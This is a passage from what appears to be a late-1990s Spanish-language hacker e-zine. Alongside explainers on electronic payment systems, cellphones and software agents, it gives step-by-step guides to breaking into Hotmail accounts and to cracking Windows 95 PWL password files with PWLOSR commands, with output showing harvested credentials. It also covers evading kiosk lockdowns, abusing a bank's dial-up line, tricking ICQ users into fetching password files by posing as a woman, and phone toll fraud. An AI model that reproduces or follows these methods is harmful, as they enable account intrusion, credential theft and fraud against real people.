ve el numero de la tarjeta de credito lo que unido al hecho de que se
comprueba la descripcion de la compra, impide el abuso por parte de los
comerciantes. En lo referente a la privacidad, aunque CyberCash tiene acceso
a la descripcoin de la compra, esta no tiene porque incluir los detalles de la
compra, puede constar como dato la referencia y el tipo solamente. De este
modo el comerciante no ve al tarjeta y CyberCash no ve el producto. Sin
embargo este sistema es susceptible a ataques de trafico, es decir del tipo
"detecto que Fedez se conecta mucho al servidor de Playboy" (Saluda Fedez,
que ya eres famosos en Inet) :o)

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Esquema de funcionamiento Cybercash ³
³ ®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯®®¯¯ ³
³ ÚÄÄÄÄÄÄ¿ ³
³ ÚÄÄÄÄÄÄÄ¿ Solicitud (1) --------------------> ³ ³ ³
³ ³ ³ <------------ (2) Factura proforma ³PAGADO³ ³
³ ³PAGADOR³ Datos pedidos tarjeta (3)---------> ³ ³ ³
³ ³ ³ <------------ (5) Respuestas ÀÄÄÄÄÂÄÙ ³
³ ÀÄÄÄÄÄÄÄÙ / \ ³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³
³ ³ ³ ³
³ Respuesta (5) ³ ³
³ ³ ³ ³
³ ³ Solicitud ³ ³
³ ÚÄÄÄÄÄÁÄÄÄ¿<-ÄÄÄ- autorizacionÄÄÄÄÄÄÙ ³
³ ³CYBERCASH³ (4) ³
³==============================³ ³=================================³
³ ³ GATEWAY ³ ³
³ ÀÄÄÄÂÄÄÄÄÄÙ ³
³ ³ ³
³ | Respuesta (5) ³
³ \ / ³
³ BANCO PAGADOR <-ÄÄÄÄÄ-ACHÄÄÄÄÄÄÄÄÄÄ-->BANCO COBRADOR ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


3.4 DIGICASH

Otro sistema es Digicash, la diferencia con CyberCash, radica en que
es un sistema de pago anticipado, donde se adquiere previamente el dinero del
banco y se almacena digitalmente en el software del comprador. Este sistema
permite la compra anonima ya que no requiere autentificacion


3.5 VIRTU@L CASH

Tambien existe Virtu@l cash, de Banesto, para poder usarla hay que tener
una cuenta en Banesto. Trabaja en un servidor seguro, certificado por la RSA.

La tarjeta Virtu@lCash es una tarjeta de debito, de manera que el importe
de la compra se adeuda en la cuenta asociada en el momento de realizarse la
operacion. La Tarjeta podra ser utilizada, exclusivamente a traves de los
comercios adheridos a este sistema de pago, limitandose los importes de las
compras al saldo disponible en la cuenta asociada a la tarjeta y a un maximo
diario preestablecido.

Repecto a la seguridad. El sistema se basa en el servicio de Comercio
electronico de Banesto apoyado en una infraestructura de seguridad, dispone
de un servidor seguro y ha obtenido el certificado electronico RSA que permite
que las comunicaciones se realicen de forma cifrada.

Asimismo, para poder asociarse a este servicio se exige a todos sus
socios, que lleven a cabo proyectos de comercio electronico, el empleo de
servidores seguros; ademas de disponer de medidas adicionales de seguridad
tales como cortafuegos.

En el momento del Pago, el usuario introduce los datos de su tarjeta
y su Numero de Identificacion Personal, que solo el conoce, la transaccion
viaja encriptada por la red y el pago se lleva a cabo en modalidad On-line
contra el saldo disponible en la cuenta.


3.6 SSL

Cuando encargamos algo desde un formulario desde nuestro navegador,
que cualquiera puede hacer con unos conocimientos de HTML, hacemos una invi-
tacion a que cualquiera pueda acceder a nuestros datos ya que esta informacion
viaja por la red hasta que llega al destino, para evitar, que esa informacion
no sea presa de sniffers, ni amigos de los ajeno :o) ¨Te encuentras tu ahi?
Se utilizan servidores seguros SSL.

El SSL es un conjunto de protocolos creados por Netscape que proporciona
sesiones de comunicacion encriptadas, autentificacion del servidor, de los
mensajes, y opcionalmente de los clientes. Esta compuesto por dos capas:
SSL Record Protocol, encargado de encapsular protocolos de bajo nivel y la SSH
Handshake Protocol que permite autentificarse y negociar los algoritmos de
encriptacion. SSL es independiente de los protocolos y capacita al programador
para realizar un desarrollo tranparente por encima de la capa TCP/IP.

Los servidores seguros SSL los podremos notar porque en al esquina
inferior izquierda cambia a una llave cerrada en el caso de netscape. En la
url, cambia de Http:// a Https:// (Hipertext Transport Protocol Secure). EL
gobierno americano permite un cifrado de 128 bits.

Aunque claro "La seguridad es solo un estado mental". Tambien el SSL
tiene problemas de seguridad, el 26 de junio de este a¤o Murray Hill,
informatico de Lucent Technologres hizo publica la manera de acceder a esa
informacion y obtener el numero de tarjeta y datos criticos de la transacion.

El ataque es posible pero poco probable. La vulnerabilidad no se
produce sobre el SSL, sino sobre PKCS, (Public Key Cryptografhy Standard)
encargado del intercambio de llaves en SSL.

El ataque consiste en mandar mensajes cuidadosamente construidos contra
el servidor seguro que produzcan sendos mensajes de error de vuelta, a partir
de cuya informacion se puede sacar la llave critica para seguridad.

Se necesitan en torno a un millon de mensajes hecho que debe llamar la
atencion del administrador del sistema.


3.7 DESPEDIDA

Bueno espero que te haya gustado esta primera parte sobre las posibi-
lades del comercio electronico, y la forma de aprovecharse, lo dicho,
cualquier duda o pregunta la puedes dirigir a pata666@bigfoot.com, aqui tienes
mi llave pgp.

Pues ya estan la pareja de articulos todos juntos, si quieres ver otros
articulos de interes puedes visitar mi web http://membres.xoom.com/pata666.

To be continued, please insert coin!!!!


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Telefonos celulares (Phreacking) - Azumlord ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NO TIENES UN CELULAR, QUE ONDA!?, OSEA NO!!! I -=( Azumlord )=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Ä[ D i s c l a i m e r ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

La informacion aqui presentada, tiene fines solamente educativos,
cualquier uso indebido de la informacion aqui contenida es responsabilidad
de usted! ( Demonios, eso lo dijeron en un comercial???), el autor no se
hace responsable de los da¤os materiales o psicologicos que sean producto
de un mal uso de lo aqui expuesto.

Ä[ J u s t i f i c a c i o n ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Bueno aqui estamos de nuevo, trayendo para ustedes algo de phreacking, en
esta primera parte, de una serie de partes(o por lo menos eso espero),
hablare sobre las bases de los celulares y de como aprovecharnos de ellos };->

Es algo corto, pero profundo.... han de disculparme pero esque estoy en
epoca de examenes y no he tenido mucho tiempo libre....

Ä[ L a s B a s e s ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Cuando hablamos de telefonia celular, nos referimos a un sistema de
comunicacion de alta tecnologia que facilita la transmision y recepcion de
mensajes sin necesidad de cables y en lugar de estos utiliza ondas
electromagneticas que viajan atravez del aire.

El microfono del celular transforma la voz en un impulso electrico, y asi
la voz puede viajar como una onda. Estas ondas golpean una pelicula del
microfono la cual esta conectada por medio de unos minusculos cables hacia
un iman.

Al tener una corriente constante y ser movida por la pelicula delgada se
producen variaciones en la corriente que son interpretadas como "la voz
electrica".

Esta "voz electrica" viaja del telefono celular al "Switch" o Centro de
Telefonia Celular de una manera inalambrica. Esto es posible gracias a la
tecnica de frecuencia modulada en donde la "voz electrica" se conecta con lo
que se denomina "Sitio Celular" o "Estacion Base", que junto con otros
sitios conforman las unidades de cobertura que por su forma hexagonal son
llamadas "Celulas".

Una vez que la voz es capturada por la "celula", es "demodulada" para
obtener nuevamente una "voz electrica" y es mandada al "Switch", el cual se
encarga de mandar la voz ya sea a otro telefono celular o a un telefono
convencional.

Ahora una forma mas practica de entender esto seria:

Cuando marcas un numero a traves de tu celular, la se¤al es recibida por
el "Switch" o Central de Telefon¡a Celular desde alguna Estacion Base.

El "Switch" verifica que el numero de tu celular este autorizado para
hacer llamadas, si no est  autorizado, el "switch" env¡a un mensaje y da por
terminado el proceso.

Si esta autorizado, el "switch" analiza el numero al que estas llamando
y decide si este pertenece a otro usuario de algun celular, o a un numero de
la Red de Telefon¡a P£blica Conmutada.

Existen dos tipos de sistemas telefonicos, los analogicos y los digitales:

->El sistema Analogico o AMPS(Advanced Mobile Phone System)

Hace referencia a la onda radial por la cual se transmite, es una se¤al
fragil, transmitida a baja potencia. La llamada es convertida en impulsos
electricos que viajan en forma de ondas de radio "Analogas" al sonido de la
voz original.

Estas ondas se distorsionan facilmente por factores naturales (lluvias),
o por obstaculos (arboles, estructuras, lineas electronicas), que ocasionan
perdida de la calidad y llamadas perdidas.

Ademas este tipo de redes no puede ser ampliadas.

->El sistema Digital o DAMPS(Digital Advanced Mobile Phone System)

Toma las se¤ales analogas (sonidos), y las traduce a codigos binarios que
pueden ser transmitidos a alta velocidad, para despues ser reconvertidos en
el sonido de la voz original. La llamada se transmite de forma similar a los
datos de computador, lo que permite que las transmisiones sean de alta
capacidad, velocidad y resistencia a los inconvenientes usuales.

Este sistema de redes permite subdividirse con el objeto de ampliarse.

Ä[ D e s p e d i d a ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Bueno pues por el momento eso es todo, se que es corto, pero esto solo son
las bases del sistema celular, en el proximo numero entraremos de fondo en
la clonada de celulares.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Guia para Hackear Hotmail - \Wend|g0 ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

by SnEzE V.2.0
980123 2.44 PM
Traducido por \Wend|g0 << http://members.xoom.com/wendigo13 >>

Existen muchas maneras de hackear hotmail, pero solamente voy a escribir las
mejores. Si estan no funcionan, por favor, mandame un email a
christog@hem1.passagen.se y mirare si has hecho algo mal o si hotmail a
cambiado algo.
Recuerda que esta informacion es solamente para propositos educacionales y que
nadie puede reprocharme el da¤o que puedas haber causado. Tambien recuerda que
si alguien descubre que has estado paseando en su cuenta, se puede volver muy
desagradable.
Ok, vamos a ello...
Estas son las formas que mas me gustan.

____
I_1_I - Brute force hacking
a. Usa el telnet para conectar al puerto 110 (servidor de Hotmail).
b. Escribe USER y el nombre de usuario de la victima.
c. Escribe PASS y entonces adivina el password.
d. Repetir hasta que se encuentre el password.
!. Esto se denomina brute force hacking y requiere paciencia. Es mejor que
intentar adivinarlos en la pagina principal de hotmail ya que es mas rapido

____
I_2_I - La mejor forma
a. Pilla el username de la victima ( normalmente se halla en el adress-field )
b. Entonces escribe " www.hotmail.com/cgi-bin/start/victimsusername "
c. Estas dentro!
!. Este hack solamente funciona si tu estas en la misma red de trabajo o
computadora de la victima y si el no ha desconectado del servidor (log out)

____
I_3_I - La manera "vieja"
a. Ves a la pagina principal de Hotmail y pilla una cuenta (si todavia no
tienes ninguna)
b. Log Out
c. Ahora escribe el username de la victima.
d. Mira el source code.
e. En la 5 fila deberias encontrar "action=someadress"
d. Copia esta direccion y pasteala dentro de adress-field
e. Estas dentro!
!. Como puedes ver esto es un procedimiento muy largo y la victima tiene
tiempo de sobra para desconectar (log out).

____
I_4_I - Otra...
a. Ves a la pagina principal de Hotmail
b. Copia el source code.
c. Haz un nuevo archivo html con el mismo codigo pero cambia method=post y pon
method=enter
d. Haz un "view" de la pagina
e. Cambia la direccion a www.hotmail.com/ (No apretes enter !!!)
f. Haz que la victima escriba su username y password
g. Mira en el adress-field. Alli podras ver ...&password:something...
!. Esto es lo que yo uso, ya que te deja conocer el password. ( Si el sale del
browser tu puedes ver el password en el History folder!
He echo un ejemplo de este truko que puedes usar en:
hem1.passagen.se/christog/index.htm. Buena suerte!

LEELO!
Los administradores de Hotmail han cambiado el sistema, asi que la victima
puede desconectar (log out) incluso si tu estas dentro de su cuenta. De modo
que no pierdas el tiempo!
Este texto viene de http://hem1.passagen.se/christog/hotmail.htm
Recuerda que es la version V.2.0.. Pronto habra mas...
Traducido por \Wend|g0 << http://members.xoom.com/wendigo13 >>


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Crackear PWL's - CHack ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Como decodificar archivos PWL de Win95 (Solo para Newbies). Por CHack ...

Una de tantas ma¤anas en las que leia la lista de Raregazz encontre un mensaje
que hablaba de la "seguridad" en Windows 95 y de que se podia entrar en las
maquinas usando algunos programas que decodifican los password de los usuarios
que se encuentran en los archivos *.PWL

Realmente no entendi mucho del tema pero el gusanillo de la curiosidad empezo
a crecer; pero, ¨relamente que era eso de los PWL?, ¨donde estaban?, ¨que
pitos tocaban?

Lo primero fue encontrar esos programas en Internet, asi que buscando en
varias paginas aparecieron el GLIDE y PWLOSR, relamente no supe como se
manejaba el GLIDE pero vi que el PWLOSR no era tan dificil de manejar.

La segunda estapa fue localizar donde estaban esos archivos PWL en mi disco
duro y despues de eso tratar de destriparlo.

El archivo PWL lo encontre en el subdirectorio:

C:\WINDOWS

El archivo tenia el nombre

juan.pwl

"casualmente" las letras de mi nombre de usuario juan.

este archivo lo copie al subdirectorio donde tenia el PWLOSR y me propuse
tratar de que el programa "adivinara" el pass, cosa no muy dificil por que
eran solo tres letras 'AAA' para ello en una ventana de DOS utilice el
siguiente comando:

PWLOSR.EXE /BRUTEFORCE [PwlFileName] [UserName]

bueno realmente lo que escribi

PWLOSR.EXE /BRUTEFORCE juan.pwl juan

Con ello el programa desplego lo siguiente:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
Beginning brute session for file 'JUAN.PWL',
of user 'JUAN' with EnuStr:
<<0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™šœ›žŸð>>.
Using password lenght 0 characters.
Using password lenght 1 characters.
Using password lenght 2 characters.
Using password lenght 3 characters.
Password 'AAA' - maybe correct!

Efectivamente el programa habia descubierto que mi pass era AAA

Una vez localizado el pass me tuve que salir de la ventana de DOS y cerrarla
desde W95, porque el programa continua buscando.

Volvi a abrir la venta de DOS y le di la instruccion

PWLOSR.EXE /LIST[:E] [PwlFileName] [UserName] [UserPwd]

PWLOSR.EXE /LIST:E juan.pwl juan AAA

Desplegando lo siguiente:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
File: 'JUAN.PWL' has size 2B0h bytes
for user 'JUAN' with password 'AAA' contains:

-[Technical Information]---------------------------------------
Password file version: 968582E3; Offset to Header: 00000252
Unknown Align: 0000; UnkCount: 00000001; CheckSeed: 00000001
CryptoSeed Array = ( 00000000, 00000000, 00000000, 00000000
-[Resources pointers]------------------------------------------
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
-[Resources key indexes]---------------------------------------
00 FF FF FF FF FF FF FF - FF FF FF FF FF FF FF FF
---------------------------------------------------------------
CryptoSign = 6C 3A 41 C3 F0 B1 0F A5 FB BD A8 A2 D8 E4 A1 C7
CheckoSign = 1F B4 4D E1 13 12 F0 CF 9D E3 AC 08 5B 44 58 57
---------------------------------------------------------------
Data = ( 0290, 0292, 0294, 0296, 0298, 029A, 029C, 029E, 02A0
Len. = ( 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000
-[Dump]--------------------------------------------------------
0290: 02 83 8B F8 - 1E B1 8D 99 - EA F0 7A 97 - 33 9F 85 D5
02A0: AB F4 E9 92 - BF AE 5E E8 - 8F AC 90 E3 - A6 ED 14 C5
-[Character]---------------------------------------------------
---------------------------------------------------------------

-[Type]-[The resource location string]--------------[Password]-
Link PLOPEZ\C pedro
-??- 222.18.36.18/222.18.36.18 bxbxbxbx:tmibmr
Dial *Rna\Data Internet\jmendez n33wr66&
Link MARYSOL\C mary
Link MEMO ROSAS\C memorin
---------------------------------------------------------------
Key Entrys: 5; Number of resources: 5.

O sorpresa, el PWLOSR no solo desplegaba mi pass, sino tambien los login y
password de las maquinas a las que me habia conectado dentro de mi intranet,
asi como mis conexiones de internet.

Para este momento ya la curiosidad por entrar a mas maquinas me corroia, asi
que con este metodo empece a entrar a otras que me dieron mas y mas
informacion; solo me enfrente a tres problemas:

1.- El programa PWLOSR solo sirve para archivos PWL de W95.

2.- El nombre del archivo PWL no siempre coincidia con el nombre
del usuario, situacion que corregi observando el archivo
C:\Windows\System.ini que en una parte que dice:

[Password Lists]
JOSEANTONIOPEREZ=C:\JOSEANTO.PWL

3.- Los pass que utiliza la gente no son tan faciles como el mio
que solo tenia tres letras, y la fuerza bruta tardaba mucho
en encontrar pass de mas de 4 letras, por lo que tuve que
utilizar un diccionario de apoyo que lo llame DICT.VOC y lo
aplique utilizando para ello el siguiente comando.

PWLOSR.EXE /VOCABULARY [PwlFileName] [UserName] [VocFile]

Bueno lo que de verdad escribi fue

PWLOSR.EXE /VOCABULARY JOSEANTO.PWL JOSEANTONIOPEREZ DICT.VOC

obteniendo el siguient resultado:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
Beginning vocabulary session for file 'JOSEANTO.PWL',
of user 'JOSEANTONIOPEREZ' via vocabulary 'DICT.VOC'.
Password 'FRANK' - maybe correct!
Password 'FRANK' - maybe correct!

Totally trained 193762 passwords, Vocabulary position 2207350.
Elapsed time 55 seconds; Average speed 3522 passwords per second.
Cracked passwords 2. Check them under MD95 Logon.

Se que para muchos el decodificar password es quiza su modo de vida, y que
este articulo puede ser solo un grano de arena en el desierto, pero realmente
espero que sirva para aquellos que empiezan en el oficio con mas ganas que
conocimiento, y quiza estas cosa por ser tan faciles nadie se toma el tiempo
para explicarlas.

Gracias a Hard Wisdom autor de PWLOSR, Gracias a la lista que con cada
respuesta incrementa mis pregunatas.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Agentes Inteligentes - 12r ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

---------------------------------------------------------------------
---------------------Agentes Inteligentes----------------------------
---------------------by 12r43l Overdrive-----------------------------
---------------------12r@antisocial.com------------------------------
---------------------------------------------------------------------

El objetivo de este articulo es explicar rapidamente que son los agentes
inteligentes a si como sus pricipales aplicaciones.

Imagina un dia, que lleges a tu PC y tus pendientes, ya esten clasificados,
que las noticias que te interesan ya estan en tu escritorio, que las ofertas
que tanto buscabas estan esperando tu compra. Todo esto sera posible gracias
al "push-technology" el cual se basara en tus preferencias para filtrar todo
tipo de informacion que no sea relevante para ti y la que te intereza sera
llevada a tu escritorio; lista para que tu decidas que hacer con ella o en
algunos casos ya este procesada.

Este tipo de tecnologia se basa en piezas de software llamadas "Agentes
Inteligentes", los cuales realizan toda la labor de recopilacion,
clasificacion, filtrado o procesado de informacion an su ambiente de trabajo
el cual puede ser desde una PC "standalone" hasta Internet.

Como parte de los sistemas de informacion de siguiente generacion existiran
objetos semi-autonomos de software que realizaran tareas especificas
previamente establecidas.

Todavia no existe una definicion universal de agentes inteligentes pero una
definicion muy general podria ser la siguiente:

"Una entidad de software autonoma que ejecuta tareal delegadas por el usuario"

Los agentes inteligentes pueden interactuar con el usuario, con sistemas de
informacion y con otros agentes. Pueden ser complejos o simples, trabajar
solos o en grupos creando una sociedad cooperativa. Pueden viajar de un nodo a
otro atravez de la red reportando sus actividades.

La mayoria de los agentes, estan basados en la idea de que el usuario solo
tiene que especificar algunas preferencias como por ejemplo 'que', 'cuando',
'donde' para que ellos puedan tomar deciciones basados en sus instrucciones.

Existen algunas caracteristicas que puede tener un software que sea
considerado un agente.

1.- Delegacion de actividades. Puede establecer algunos trabajos a otros
agentes para lograr su trabajo final.

2.- Habilidad de comunicacion. Tiene que tener la habilidad de interactuar con
el usuario asi como con otros agentes o medios.

3.- Monotireo. El agente debe de monitorear su entorno para poder realizar
actividades autonomamente.

4.- Actuacion. Debe de poder afectar su ambiente de trabajo.

5.- Inteligencia. El agente debe de poder interpretar los eventos que le
incumban para poder tener una actuacion apropiada asi como tomar
deciciones.

6.- Continuacion. Necesita permanecer activo, corriendo procesos y actulizando
su estado.

7.- Caracter. Algunos agentes pueden tener un estado emocional.

8.- Adaptabilidad. Deben optimizarse automaticamente basados en las
preferencias de usuario aprendidas previamente.

9.- Mobilidad. Deben de tener la capacidad de transportarse a traves de redes
y distintas plataformas y arquitecturas de informacion.

Entre las pricipales aplicaciones de los Agentes Inteligentes tenemos las
siguientes:

Correo electronico, Sistemas de soporte de decision, Interfaz de usuario,
Teleconferencia, Telecomunicaciones, Sistemas de calendarizacion,
Entretenimiento, Web, Sistemas FAQ, Archivos de USENET, Editores graficos.

Recusos :

LALO (http://www.crim.ca/sbc/english/lalo)
Agent Building Enviroment (http://raleigh.ibm.com/iag/iagsoft.htm)
W-Prolog (http://munkora.cs.mu.oz.au/~winikoff/wp/)
Tabriz Agent Ware

  
(http://www.genmagic.com/Tabriz/)
Phantom (http://apocalypse.org/pub/u/antony/phantom/phantom.html)
Agent builder (http://www.cs.umbc.edu/news/raise.shtml)
Java Intelligent Agent Library
(http://www.bitpix.com/business/main/ialib/ialib.html)
Tcl Plug-ins (http://www.sun.com/960710/feature1/plugin.html)
Aglets Library (http://www.ibm.co.jp/trl/projects/aglets/)
Jess (http://herzberg.ca.sandia.gov/jess/)
Penguin (http://coriolan.amicus.com/penguin.html)
HORB (http://wwww.mysticgrp.com/java/horb/welcome.html)
Autonomus Agent Programming using Java (http://riz.siac.com/AIT/agentref.html)
Java-To-Go- Interactive Computing Using Java.
(http://ptolemy.eecs.berkeley.edu/~wli/group/java2go/java-to-go.html)
Cyberagent SDK (http://www.ftp.com/cyberagents/)
Oracle Web Agent
(http://www.oracle.com/products/websystems/webserver/html/ois3.html)
Phyton (http://www.phyton.org)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Varios trucos interesantes - SatMex ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

1) Como joder los banners del anonymizer.com

Estas cansado de los banners? Yo si y mucho pero te voy a decir como quitarlos
sin pagar un centavo solo tienes que cambiar el puerto:

http://invis.user.anonymizer.com/www.hostremoto.com.gob.mx.etc.etc

Activalo en tu browser como proxy (donde dice puerto no escribas nada) y listo
tienes proxy. La diferencia del anonymizer y otros ademas de que cobran por
usarlo es que te permite entrar a cualquier direccion no importa que no acepte
proxy (por lo menos en el hotmail me funciona).

Si por alguna razon es cancelado te voy a decir como puedes saver la nueva
direccion o el proxy; esto lo descubri escaneando los puertos del anonymizer.
Es facil, solo con el un port scanner escanea www.anonymizer.com y los puertos
que esten abiertos trata de ver su los puedes usar de proxy. Hay muchos
puertos abiertos y la mayoria funcionan.


2) Como poder explorar las computadorasde telmex que estan de demostracion con
internet directo.

La otra vez que fui a pagar el telefono a telmex y descubri que habian puesto
computadoras de muestra con internet para los clientes :) lo malo es que
estaban protegida con algun programa que no te deja usar explorer, ms-dos,
promt, desabilitadas muchas opciones (la verdad casi todas, run, shutdown,
restar, restar msdos, etc, le busque y le busque pero con que estaban
deshablilitadas muchas opciones pero usando el internet explorer (browser) en
donde esta el link puedes poner c:\windows y puedes ver la informacion y
ejecutarla.. (en el caso de mi pueblo asi estan deshabilitadas las opciones no
se sin en otro lugar estan activadas)


3) Banco Bital

La otra vez lei en un emag de raregazz pasado un numero carrier del banco
bital. El numero era 91-800-50140 pues lo probe como una conexion ordinaria a
internet y cuando te pide el username: password y le das cualquier username y
password y marca que es incorrecto el login lo intentas de nuevo y en cuanto
des enter despues de que escribas la password precionas la tecla F7 y te
conecta a internet a una velocidad de 9600bps (te lo garantizo pero primero
tienes que precionar breaks para que te aparezca el login). Pero no te creas
que ya tienes conexion a internet. lo bueno es que te asigna ip adress pero
unicamente solo puedes utilizar el ICQ y puedes escanear puertos, finger,
whois, ping, trace. Tambien si se conectan 2 o mas personas con este mismo
numero pueden compartir informacion por la razon que estan en el mismo
servidor y pudes poner tu ftp server y que el otro usuario pueda entrar.
Pero no puedes entrar a ningun chat no puedes usar telnet ni conectarte a una
pagina web al menos que sea la pagina de www.bital.com.mx)

Usa condon pa que no te cachen.....

Proximamente tendre el numero de telefono (carrier) para que te conectes free
a internet por medio de este servidor con estas claves.....


4) Hackeando desde el ICQ

En estos dias el icq es el programa mas popular en el internet; si no sabes
que es icq, es un programita que viene siendo un beeper y un celular mientras
ese programita este activado estaras en linea con tus amigos. Pero no te voy a
explicar muy bien mejor vete a www.mirabilis.com. Ahora que el icq esta de
moda supongamos que nececitas una password de un servidor Ftp o alguien que
quieras que te haga el favor de bajarte el /etc/shadow pues de la manera mas
facil te vas a "add find users". Alli esta la opcion "icq main engine"
escojela y donde dice email pones *@host.com.gob.mx.etc.etc y te saldran todos
los usuarios de ese servidor y alli tu podras ver su info (all algunos muy
l4m3rz que hasta ponen su telefono y su direccion y su nombre completo email,
etc;) esto resulta mejor que el finger ;) de alli es una forma de tratar de
acesar usando los apellidos o nombres de la persona pero otra forma que a mi
me a resultado es contactando a esa persona y haciendome su amiga entonces le
hago preguntas tu provedor acepta ftp? tu provedor te da tu password o tu la
eliges? Si no sabe que es ftp solo dale el ftp pero en el browser dile que
ponga esto porque se de muchos ignorantes que no saben ni madre:
ftp://username:password@la_direccion_de_su_server.com/etc/passwd
y dile que te pase el texto que salio ;)
O tambien puedes usar mas ingenieria social solo es cuestion de pensar.....
(te recomiendo que registres otra cuenta y te pongas nombre de mujer joven y
atractiva para obtener mejores resultados y para que no te cachen.....)


5) Hacer Preacking desde cualquier lugar del mundo llamando a Usa *free*

Te has fijado que los telefonos publicos de USA (Estados Unidos Americanos)
puedes llamar a los telefonos publicos?. Haz una llamada por cobrar a un
telefono publico y cuando contesten de el otro lado ese telefono sonara (claro
que el publico) la operadora dire "acepta los cargos y ustedes contestan si.
Si no lo has hecho hazlo =)
Recuerda que tienes que buscar un telefono publico que permita recibir
llamadas; de esos hay muchos en USA, no se si en otro lado habra; a mi siempre
me funciona cuando hablo con mis hermanos....

Email Me:
Sat@lanet.com.pe
Sat@cotopaxi.dyn.ml.org


